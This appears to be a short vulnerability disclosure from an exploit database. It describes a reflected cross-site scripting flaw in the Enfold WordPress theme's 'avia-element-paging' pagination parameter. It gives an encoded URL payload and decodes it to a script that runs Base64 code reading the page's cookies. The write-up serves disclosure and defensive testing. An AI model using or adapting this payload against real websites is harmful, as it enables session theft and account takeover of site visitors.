Share
## https://sploitus.com/exploit?id=WPEX-ID:A53E213F-6011-47F8-93E6-AA5AD30E857E
The issue appears when pagination comes in place while navigating on a WordPress site with Enfold theme active. When that occurs, the parameter โ€œavia-element-pagingโ€ appears.

https://[website]/paginated-entry/........&avia-element-paging=2

It is possible for an attacker to add some input text in the URL that is reflected on the response. Therefore, there is a XSS vulnerability that can be exploited crafting a customized URL which includes a link to a paginated entry:

https://[website]/paginated-entry/?ProofOfConcept

"ProofOfConcept" text will be reflected on the server's response. It will be included on generated page buttons.

The attacker can exploit this issue by sending the following payload:

?%2527%253E%253Cscript%253Eeval%2528atob%2528%2522Y29uc29sZS5sb2coZG9jdW1lbnQuY29va2llKQ%253D%253D%2522%2529%2529%253C%252Fscript%253E

which can be decoded as:

'><script>eval(atob("Y29uc29sZS5sb2coZG9jdW1lbnQuY29va2llKQ=="))</script>


and the Base64 payload decoded as:

console.log(document.cookie);